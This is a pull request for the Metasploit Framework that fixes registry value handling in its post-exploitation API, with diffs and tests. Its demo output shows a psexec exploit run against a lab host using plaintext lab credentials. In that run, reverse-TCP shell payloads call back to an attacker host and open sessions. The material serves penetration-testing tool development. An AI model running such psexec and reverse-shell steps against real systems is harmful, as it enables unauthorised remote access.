### PR TITLE
Fix Multiple Registry Related Issues

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -30,7 +30,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.94)
+      metasploit-payloads (= 2.0.96)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.18)
       mqtt
@@ -248,7 +248,7 @@ GEM
       activemodel (~> 6.0)
       activesupport (~> 6.0)
       railties (~> 6.0)
-    metasploit-payloads (2.0.94)
+    metasploit-payloads (2.0.96)
     metasploit_data_models (5.0.5)
       activerecord (~> 6.0)
       activesupport (~> 6.0)

--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -415,6 +415,12 @@ protected
     case type
     when 'REG_BINARY'
       data = data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+    when 'REG_EXPAND_SZ'
+      if session.type == 'powershell'
+        data = data.gsub('%', '""%""')
+      elsif session.type == 'shell'
+        data = data.gsub('%', '"%"')
+      end
     when 'REG_MULTI_SZ'
       data = data.join('\0')
     end

--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -40,6 +40,7 @@ module Registry
   REG_BIG_ENDIAN = 5
   REG_LINK = 6
   REG_MULTI_SZ = 7
+  REG_QWORD = 11
 
   HKEY_CLASSES_ROOT = 0x80000000
   HKEY_CURRENT_USER = 0x80000001
@@ -383,7 +384,7 @@ protected
 
     # split with ' ' yielding [valname,REGvaltype,REGdata] and extract reg type
     vtype = match_arr[0].split[1]
-    if %w[ REG_SZ REG_MULTI_SZ REG_EXPAND_SZ REG_DWORD REG_BINARY REG_NONE ].include?(vtype)
+    if %w[ REG_BINARY REG_DWORD REG_EXPAND_SZ REG_MULTI_SZ REG_NONE REG_QWORD REG_SZ ].include?(vtype)
       value['Type'] = self.class.const_get(vtype)
     end
     # treat the remainder of the line after the reg type as the reg value
@@ -391,7 +392,7 @@ protected
     case vtype
     when 'REG_BINARY'
       vdata = vdata.scan(/../).map { |x| x.hex.chr }.join
-    when 'REG_DWORD'
+    when 'REG_DWORD', 'REG_QWORD'
       if vdata.start_with?('0x')
         vdata = vdata[2..].to_i(16)
       else

--- a/lib/msf/core/post/windows/registry.rb
+++ b/lib/msf/core/post/windows/registry.rb
@@ -358,8 +358,10 @@ protected
   # Returns the data portion of the value +valname+
   #
   def shell_registry_getvaldata(key, valname, view)
-    a = shell_registry_getvalinfo(key, valname, view)
-    a["Data"] || nil
+    valinfo = shell_registry_getvalinfo(key, valname, view)
+    return nil if valinfo.nil?
+
+    valinfo['Data']
   end
 
   #

--- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
@@ -122,6 +122,7 @@ REG_DWORD_LITTLE_ENDIAN  = 4
 REG_DWORD_BIG_ENDIAN     = 5
 REG_LINK                 = 6
 REG_MULTI_SZ             = 7
+REG_QWORD                = 11
 
 ##
 #

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -217,11 +217,13 @@ class Registry
 
     case type
     when REG_DWORD
-      data = [data.to_i].pack('V')
+      data = [data.to_i].pack('L<')
     when REG_EXPAND_SZ
       data += "\x00".b
     when REG_MULTI_SZ
       data = data.join("\x00".b) + "\x00\x00".b
+    when REG_QWORD
+      data = [data.to_i].pack('Q<')
     when REG_SZ
       data += "\x00".b
     end
@@ -244,11 +246,13 @@ class Registry
 
     case type
     when REG_DWORD
-      data = [data.to_i].pack('V')
+      data = [data.to_i].pack('L<')
     when REG_EXPAND_SZ
       data += "\x00".b
     when REG_MULTI_SZ
       data = data.join("\x00".b) + "\x00\x00".b
+    when REG_QWORD
+      data = [data.to_i].pack('Q<')
     when REG_SZ
       data += "\x00".b
     end
@@ -279,11 +283,13 @@ class Registry
 
     case type
     when REG_DWORD
-      data = data.unpack1('N')
+      data = data.unpack1('L>')
     when REG_EXPAND_SZ
       data = data[0..-2]
     when REG_MULTI_SZ
       data = data[0..-3].split("\x00".b)
+    when REG_QWORD
+      data = data.unpack1('Q<')
     when REG_SZ
       data = data[0..-2]
     end
@@ -305,11 +311,13 @@ class Registry
 
     case type
     when REG_DWORD
-      data = data.unpack1('N')
+      data = data.unpack1('L>')
     when REG_EXPAND_SZ
       data = data[0..-2]
     when REG_MULTI_SZ
       data = data[0..-3].split("\x00".b)
+    when REG_QWORD
+      data = data.unpack1('Q<')
     when REG_SZ
       data = data[0..-2]
     end
@@ -426,6 +434,7 @@ class Registry
     when 'REG_EXPAND_SZ' then REG_EXPAND_SZ
     when 'REG_MULTI_SZ'  then REG_MULTI_SZ
     when 'REG_NONE'      then REG_NONE
+    when 'REG_QWORD'     then REG_QWORD
     when 'REG_SZ'        then REG_SZ
     else
       nil

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -215,10 +215,13 @@ class Registry
     request.add_tlv(TLV_TYPE_VALUE_NAME, name)
     request.add_tlv(TLV_TYPE_VALUE_TYPE, type)
 
-    if type == REG_SZ || type == REG_MULTI_SZ
-      data += "\x00"
-    elsif (type == REG_DWORD)
-      data = [ data.to_i ].pack("V")
+    case type
+    when REG_DWORD
+      data = [data.to_i].pack('V')
+    when REG_MULTI_SZ
+      data = data.join("\x00".b) + "\x00\x00".b
+    when REG_SZ
+      data << "\x00".b
     end
 
     request.add_tlv(TLV_TYPE_VALUE_DATA, data)
@@ -237,10 +240,13 @@ class Registry
     request.add_tlv(TLV_TYPE_VALUE_NAME, name)
     request.add_tlv(TLV_TYPE_VALUE_TYPE, type)
 
-    if type == REG_SZ || type == REG_MULTI_SZ
-      data += "\x00"
-    elsif type == REG_DWORD
+    case type
+    when REG_DWORD
       data = [data.to_i].pack('V')
+    when REG_MULTI_SZ
+      data = data.join("\x00".b) + "\x00\x00".b
+    when REG_SZ
+      data << "\x00".b
     end
 
     request.add_tlv(TLV_TYPE_VALUE_DATA, data)
@@ -267,10 +273,13 @@ class Registry
     type = response.get_tlv(TLV_TYPE_VALUE_TYPE).value
     data = response.get_tlv(TLV_TYPE_VALUE_DATA).value
 
-    if type == REG_SZ
+    case type
+    when REG_DWORD
+      data = data.unpack1('N')
+    when REG_MULTI_SZ
+      data = data[0..-3].split("\x00".b)
+    when REG_SZ
       data = data[0..-2]
-    elsif type == REG_DWORD
-      data = data.unpack('N')[0]
     end
 
     Rex::Post::Meterpreter::Extensions::Stdapi::Sys::RegistrySubsystem::RegistryValue.new(
@@ -288,10 +297,13 @@ class Registry
     data = response.get_tlv(TLV_TYPE_VALUE_DATA).value
     type = response.get_tlv(TLV_TYPE_VALUE_TYPE).value
 
-    if (type == REG_SZ)
+    case type
+    when REG_DWORD
+      data = data.unpack1('N')
+    when REG_MULTI_SZ
+      data = data[0..-3].split("\x00".b)
+    when REG_SZ
       data = data[0..-2]
-    elsif (type == REG_DWORD)
-      data = data.unpack("N")[0]
     end
 
     return Rex::Post::Meterpreter::Extensions::Stdapi::Sys::RegistrySubsystem::RegistryValue.new(

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -219,11 +219,11 @@ class Registry
     when REG_DWORD
       data = [data.to_i].pack('V')
     when REG_EXPAND_SZ
-      data << "\x00".b
+      data += "\x00".b
     when REG_MULTI_SZ
       data = data.join("\x00".b) + "\x00\x00".b
     when REG_SZ
-      data << "\x00".b
+      data += "\x00".b
     end
 
     request.add_tlv(TLV_TYPE_VALUE_DATA, data)
@@ -246,11 +246,11 @@ class Registry
     when REG_DWORD
       data = [data.to_i].pack('V')
     when REG_EXPAND_SZ
-      data << "\x00".b
+      data += "\x00".b
     when REG_MULTI_SZ
       data = data.join("\x00".b) + "\x00\x00".b
     when REG_SZ
-      data << "\x00".b
+      data += "\x00".b
     end
 
     request.add_tlv(TLV_TYPE_VALUE_DATA, data)

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -218,6 +218,8 @@ class Registry
     case type
     when REG_DWORD
       data = [data.to_i].pack('V')
+    when REG_EXPAND_SZ
+      data << "\x00".b
     when REG_MULTI_SZ
       data = data.join("\x00".b) + "\x00\x00".b
     when REG_SZ
@@ -243,6 +245,8 @@ class Registry
     case type
     when REG_DWORD
       data = [data.to_i].pack('V')
+    when REG_EXPAND_SZ
+      data << "\x00".b
     when REG_MULTI_SZ
       data = data.join("\x00".b) + "\x00\x00".b
     when REG_SZ
@@ -276,6 +280,8 @@ class Registry
     case type
     when REG_DWORD
       data = data.unpack1('N')
+    when REG_EXPAND_SZ
+      data = data[0..-2]
     when REG_MULTI_SZ
       data = data[0..-3].split("\x00".b)
     when REG_SZ
@@ -300,6 +306,8 @@ class Registry
     case type
     when REG_DWORD
       data = data.unpack1('N')
+    when REG_EXPAND_SZ
+      data = data[0..-2]
     when REG_MULTI_SZ
       data = data[0..-3].split("\x00".b)
     when REG_SZ

--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
@@ -75,6 +75,7 @@ class RegistryValue
     return "REG_BINARY" if (type == REG_BINARY)
     return "REG_EXPAND_SZ" if (type == REG_EXPAND_SZ)
     return "REG_NONE" if (type == REG_NONE)
+    return "REG_MULTI_SZ" if (type == REG_MULTI_SZ)
     return nil
   end
 

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1019,7 +1019,9 @@ class Console::CommandDispatcher::Stdapi::Sys
               print_error('Invalid characters provided! Could not fully convert data provided to -d argument!')
               return false
             end
-           data = data.pack("C*")
+            data = data.pack("C*")
+          elsif type == 'REG_MULTI_SZ'
+            data = data.split('\0')
           end
 
           open_key.set_value(value, client.sys.registry.type2str(type), data)
@@ -1066,6 +1068,8 @@ class Console::CommandDispatcher::Stdapi::Sys
           data = v.data
           if v.type == REG_BINARY
             data = data.unpack('H*')[0]
+          elsif v.type == REG_MULTI_SZ
+            data = data.join('\0')
           end
 
           print(

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1020,6 +1020,15 @@ class Console::CommandDispatcher::Stdapi::Sys
               return false
             end
             data = data.pack("C*")
+          elsif type == 'REG_DWORD' || type == 'REG_QWORD'
+            if data =~ /^\d+$/
+              data = data.to_i
+            elsif data =~ /^0x[a-fA-F0-9]+$/
+              data = data[2..].to_i(16)
+            else
+              print_error("Invalid data provided, #{type} must be numeric.")
+              return false
+            end
           elsif type == 'REG_MULTI_SZ'
             data = data.split('\0')
           end

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.94'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.96'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.18'
   # Needed by msfgui and other rpc components

--- a/modules/post/windows/gather/enum_shares.rb
+++ b/modules/post/windows/gather/enum_shares.rb
@@ -124,15 +124,11 @@ class MetasploitModule < Msf::Post
     shares = []
     print_status('The following shares were found:')
     share_names.each do |sname|
-      info = registry_getvaldata(shares_key, sname)
-      next if info.nil?
+      share_info = registry_getvaldata(shares_key, sname)
+      next if share_info.nil?
 
       print_status("\tName: #{sname}")
 
-      # NOTE: Extracting these values will fail on Meterpreter.
-      # Share info keys are REG_MULTI_SZ. Meterpreter stdapi registry
-      # query_value() function returns malformed REG_MULTI_SZ values.
-      share_info = info.split('\\0')
       stype = remark = path = nil
       share_info.each do |e|
         name, val = e.split('=')

--- a/test/lib/module_test.rb
+++ b/test/lib/module_test.rb
@@ -3,6 +3,9 @@ module Msf
     attr_accessor :tests
     attr_accessor :failures
 
+    class SkipTestError < ::Exception
+    end
+
     def initialize(info = {})
       @tests = 0
       @failures = 0
@@ -16,6 +19,10 @@ module Msf
       }
     end
 
+    def skip(msg = "No reason given")
+      raise SkipTestError, msg
+    end
+
     def it(msg = "", &block)
       @tests += 1
       begin
@@ -26,9 +33,11 @@ module Msf
           @failures += 1
           return
         end
+      rescue SkipTestError => e
+        print_status("SKIPPED: #{msg} (#{e.message})")
       rescue ::Exception => e
         print_error("FAILED: #{msg}")
-        print_error("Exception: #{e.class} : #{e}")
+        print_error("Exception: #{e.class}: #{e}")
         dlog("Exception in testing - #{msg}")
         dlog("Call stack: #{e.backtrace.join("\n")}")
         return

--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Post
         # type == REG_EXPAND_SZ means string
         ret &&= !!(valinfo["Type"] == 2)
         ret &&= !!(valinfo["Data"].kind_of? String)
-        ret &&= !!(valinfo["Data"].casecmp('C:\Windows\system32'))
+        ret &&= !!(valinfo["Data"] == value)
       end
 
       ret

--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -136,6 +136,24 @@ class MetasploitModule < Msf::Post
         ret &&= !!(valinfo["Data"].kind_of? Numeric)
         ret &&= !!(valinfo["Data"] == 1234)
       end
+
+      ret
+    end
+
+    it "should write REG_EXPAND_SZ values" do
+      ret = true
+      value = '%SystemRoot%\system32'
+      registry_setvaldata(%q#HKCU\test_key#, "test_val_expand_str", value, "REG_EXPAND_SZ")
+      valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_expand_str")
+      if (valinfo.nil?)
+        ret = false
+      else
+        # type == REG_EXPAND_SZ means string
+        ret &&= !!(valinfo["Type"] == 2)
+        ret &&= !!(valinfo["Data"].kind_of? String)
+        ret &&= !!(valinfo["Data"] == 'C:\Windows\system32')
+      end
+
       ret
     end
 
@@ -147,7 +165,7 @@ class MetasploitModule < Msf::Post
       if (valinfo.nil?)
         ret = false
       else
-        # type == REG_MULTI_SZ means string
+        # type == REG_MULTI_SZ means string array
         ret &&= !!(valinfo["Type"] == 7)
         ret &&= !!(valinfo["Data"].kind_of? Array)
         ret &&= !!(valinfo["Data"] == values)

--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -202,6 +202,21 @@ class MetasploitModule < Msf::Post
       ret
     end
 
+    it "should write REG_QWORD values" do
+      ret = true
+      registry_setvaldata(%q#HKCU\test_key#, "test_val_qword", 1234, "REG_QWORD")
+      valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_qword")
+      if (valinfo.nil?)
+        ret = false
+      else
+        ret &&= !!(valinfo["Type"] == 11)
+        ret &&= !!(valinfo["Data"].kind_of? Numeric)
+        ret &&= !!(valinfo["Data"] == 1234)
+      end
+
+      ret
+    end
+
     it "should write REG_SZ values" do
       ret = true
       registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")

--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -108,6 +108,37 @@ class MetasploitModule < Msf::Post
       ret = registry_createkey(%q#HKCU\test_key#)
     end
 
+    it "should write REG_BINARY values" do
+      ret = true
+      value = Random.bytes(32)
+      registry_setvaldata(%q#HKCU\test_key#, "test_val_bin", value, "REG_BINARY")
+      valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_bin")
+      if (valinfo.nil?)
+        ret = false
+      else
+        # type == REG_BINARY means string
+        ret &&= !!(valinfo["Type"] == 3)
+        ret &&= !!(valinfo["Data"].kind_of? String)
+        ret &&= !!(valinfo["Data"] == value)
+      end
+
+      ret
+    end
+
+    it "should write REG_DWORD values" do
+      ret = true
+      registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
+      valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
+      if (valinfo.nil?)
+        ret = false
+      else
+        ret &&= !!(valinfo["Type"] == 4)
+        ret &&= !!(valinfo["Data"].kind_of? Numeric)
+        ret &&= !!(valinfo["Data"] == 1234)
+      end
+      ret
+    end
+
     it "should write REG_MULTI_SZ values" do
       ret = true
       values = %w[ val0 val1 ]
@@ -138,20 +169,6 @@ class MetasploitModule < Msf::Post
         ret &&= !!(valinfo["Data"] == "str!")
       end
 
-      ret
-    end
-
-    it "should write REG_DWORD values" do
-      ret = true
-      registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
-      valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
-      if (valinfo.nil?)
-        ret = false
-      else
-        ret &&= !!(valinfo["Type"] == 4)
-        ret &&= !!(valinfo["Data"].kind_of? Numeric)
-        ret &&= !!(valinfo["Data"] == 1234)
-      end
       ret
     end
 

--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -57,8 +57,36 @@ class MetasploitModule < Msf::Post
 
       valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP", REGISTRY_VIEW_NATIVE)
       ret &&= !!(valinfo["Data"] == valdata)
+
+      ret
+    end
+
+    it "should read values with a 32-bit view" do
+      if session.type == 'shell' && cmd_exec('cmd.exe /c reg  QUERY /?') !~ /\/reg:\d\d/
+        skip('the target does not support non-native views')
+      end
+
+      ret = true
+      valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
+      ret &&= !!(valinfo["Data"])
+      ret &&= !!(valinfo["Type"])
+
       valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP", REGISTRY_VIEW_32_BIT)
       ret &&= !!(valinfo["Data"] == valdata)
+
+      ret
+    end
+
+    it "should read values with a 64-bit view" do
+      if session.type == 'shell' && cmd_exec('cmd.exe /c reg  QUERY /?') !~ /\/reg:\d\d/
+        skip('the target does not support non-native views')
+      end
+
+      ret = true
+      valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
+      ret &&= !!(valinfo["Data"])
+      ret &&= !!(valinfo["Type"])
+
       valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP", REGISTRY_VIEW_64_BIT)
       ret &&= !!(valinfo["Data"] == valdata)
 
@@ -151,7 +179,7 @@ class MetasploitModule < Msf::Post
         # type == REG_EXPAND_SZ means string
         ret &&= !!(valinfo["Type"] == 2)
         ret &&= !!(valinfo["Data"].kind_of? String)
-        ret &&= !!(valinfo["Data"] == 'C:\Windows\system32')
+        ret &&= !!(valinfo["Data"].casecmp('C:\Windows\system32'))
       end
 
       ret

--- a/test/modules/post/test/registry.rb
+++ b/test/modules/post/test/registry.rb
@@ -108,10 +108,26 @@ class MetasploitModule < Msf::Post
       ret = registry_createkey(%q#HKCU\test_key#)
     end
 
+    it "should write REG_MULTI_SZ values" do
+      ret = true
+      values = %w[ val0 val1 ]
+      registry_setvaldata(%q#HKCU\test_key#, "test_val_multi_str", values, "REG_MULTI_SZ")
+      valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_multi_str")
+      if (valinfo.nil?)
+        ret = false
+      else
+        # type == REG_MULTI_SZ means string
+        ret &&= !!(valinfo["Type"] == 7)
+        ret &&= !!(valinfo["Data"].kind_of? Array)
+        ret &&= !!(valinfo["Data"] == values)
+      end
+
+      ret
+    end
+
     it "should write REG_SZ values" do
       ret = true
       registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")
-      registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
       valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
       if (valinfo.nil?)
         ret = false


### PR DESCRIPTION
This fixes a few (but not all 😞 ) registry-related issues in the Post API.

* Fixes how `REG_MULTI_SZ` is handled by Meterpreter sessions
* Fixes how `REG_BINARY` is handled by shell sessions
* Fixes how Powershell sessions identify missing keys and values
* Fixes view handling for shell sessions
* Adds `REG_BINARY`, `REG_MULTI_SZ`, `REG_QWORD` tests to `post/test/registry`
* Fixes the `Type` key data-type returned by `registry_getvalinfo`
* Fixes how `REG_EXPAND_SZ` is handled by Shell sessions
* Fixes Windows XP shell sessions reporting that they fail to read values

## REG_MULTI_SZ Handling By Meterpreter Sessions
The changes require [rapid7/meterpreter-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587) for the Windows Meterpreter and ensure that the Windows and Python Meterpreters can both read and write REG_MULTI_SZ values. The data block sent to Meterpreter is now consistently null terminated strings with a double null-terminator. This is consistent with what the Windows API expects. The Windows Meterpreter will handle string encoding. This also updates the `registry_getvalinfo` post API method to use an array of strings as both the argument and return type for `REG_MULTI_SZ`. This is consistent with it's behavior for `REG_DWORD` in the sense that the data type is dependent on the registry key value. The `post/gather/windows/enum_shares` module is the only instance in which this data type appears to be used from either a module or library and has been updated appropriately.

The command line syntax for the `reg` command in the Meterpreter UI is the same.

## REG_BINARY Handling By Shell Sessions
Shell sessions now properly encode the binary data so the command can execute successfully. On return the ascii-hex encoded blob is decoded, allowing the Post API to just deal with a binary string for both (Power)shell and Meterpreter sessions.

## Powershell Sessions Identify Missing Keys and Values
Powershell sessions don't appear to include the `Error:` string. Instead they just return a string with whitespace. The post API was updated to treat that as a non-existant key/value. This is probably a better approach anyways since the word "Error" may be different in other locales.

## View Handling For Shell Sessions
The `/reg:##` argument appeared to be in the wrong location. This moves it to the end of the command, allowing it to execute successfully.

## `Type` Key Data-Type
Shell sessions were returning a string in the `Type` key (which is the registry data-type, e.g. REG_SZ, REG_DWORD, etc.). The Meterpreter sessions returned the constant value which is a string. This inconsistency has been rectified, acknowledging the precedence set by the existing `post/test/registry` module. This was key to making (power)shell sessions pass the tests.

## REG_EXPAND_SZ Handling By Meterpreter Sessions
Shell sessions where causing the environment variables to be expanded at the time that the value was set in the registry. This meant that it was also expanded on retrieval. This updates the set routine to properly escape the `%` characters so that the value is set correctly. `REG_EXPAND_SZ` values are not expanded by anything upon read.

The API has been updated to handle this type in the same way as shells sessions, where the resulting value is expanded and not null terminated.

## Windows XP Shell Sessions Reporting Read Failures
The original tests for reading values included the default / native view along side the explicit 32-bit and 64-bit views. Windows XP does not offer the `/reg` command line option to specify an explicit view. This resulted in the entire test failing. This was updated by adding a `skip` function inspired by rspec and then using it when a shell session doesn't report that it offers the `/reg` argument to the `QUERY` subcommand. This allows those tests to be skipped when the target doesn't support it.

## Remaining Known Issues
These issues are still outstanding.

- [ ] Windows XP shell sessions don't handle unicode correctly
- [ ] Powershell sessions don't handle unicode correctly
- [ ] Stageless shell sessions fail *all* `post/test/registry` tests when run with `AutoRunScript`
    I haven't fully looked into this, but I suspect it has something to do with how the banner is handled. When a stageless shell session is used, it's not recognized as Windows, and then the module fails.
    ```
    ...
    [*] Running against session 4
    [*] Session type is shell and platform is 
    [-] FAILED: should create keys
    ...
    ```
- [ ] PHP Meterpreter session's registry-commands don't appear to be functional. See the footnote in [rapid7/metasploit-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587).

## Verification

List the steps needed to make sure this thing works

- [ ] Run the `post/test/registry` module for a Powershell session, see only the one issue (not handling unicode correctly)
- [ ] Run the `post/test/registry` module for a Shell session, see no failures (2 skips on XP)
- [ ] Run the `post/test/registry` module for a Meterpreter session, see no failures (need the changes from [rapid7/metasploit-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587))
- [ ] Run the `post/windows/gather/enum_shares` module for a Meterpreter session, see the full output
- [ ] Run the `reg` command to set and query REG_MULTI_SZ values from the Meterpreter UI
    - [ ] Run: `reg setval -k HKCU\\Testing -t REG_MULTI_SZ -v "test_multi" -d "line1\0line2\0line3"`
    - [ ] Run: `reg qureyval -k HKCU\\Testing -t REG_MULTI_SZ -v "test_multi"`
    - [ ] On the Windows target, load the value in the regedit, and see that line1, line2 and line3 are each on separate lines

<details>
<summary>Demo Output</summary>

The following demo opens five sessions, one powershell, two staged-shell and two Meterpreter (using the changes from [rapid7/metasploit-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587) and [rapid7/metasploit-payloads#585](https://github.com/rapid7/metasploit-payloads/pull/585)). It then shows that the  the `post/test/registry` module runs with only the expected failures. Finally, it shows that the `reg` command as provided by the Meterpreter UI continues to work with the `\0` syntax.

```
./msfconsole -r test.rc
[*] Using configured payload windows/shell/reverse_tcp
                                                  

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)


Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................


Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


       =[ metasploit v6.2.15-dev-80e4abe2b4               ]
+ -- --=[ 2241 exploits - 1182 auxiliary - 398 post       ]
+ -- --=[ 884 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the edit command to open the 
currently active module in your editor

[*] Processing test.rc for ERB directives.
resource (test.rc)> loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
resource (test.rc)> use exploit/windows/smb/psexec
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
resource (test.rc)> set SMBUser smcintyre
SMBUser => smcintyre
resource (test.rc)> set SMBPass Password1!
SMBPass => Password1!
resource (test.rc)> set RHOST 192.168.159.10
RHOST => 192.168.159.10
resource (test.rc)> set AutoRunScript post/test/registry
AutoRunScript => post/test/registry
resource (test.rc)> set TARGET Automatic
TARGET => Automatic
resource (test.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
PAYLOAD => windows/x64/shell/reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4509
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Sending stage (336 bytes) to 192.168.159.10
[*] Session ID 1 (192.168.159.128:4444 -> 192.168.159.10:56500) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: shell
[*] Running against session 1
[*] Session type is shell and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[*] Passed: 16; Failed: 0
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.10:56500) at 2022-09-08 13:23:59 -0400
[*] Session 1 created in the background.
resource (test.rc)> set TARGET Automatic
TARGET => Automatic
resource (test.rc)> set PAYLOAD windows/x64/powershell_reverse_tcp
PAYLOAD => windows/x64/powershell_reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 6532
[*] 192.168.159.10:445 - Executing the payload...
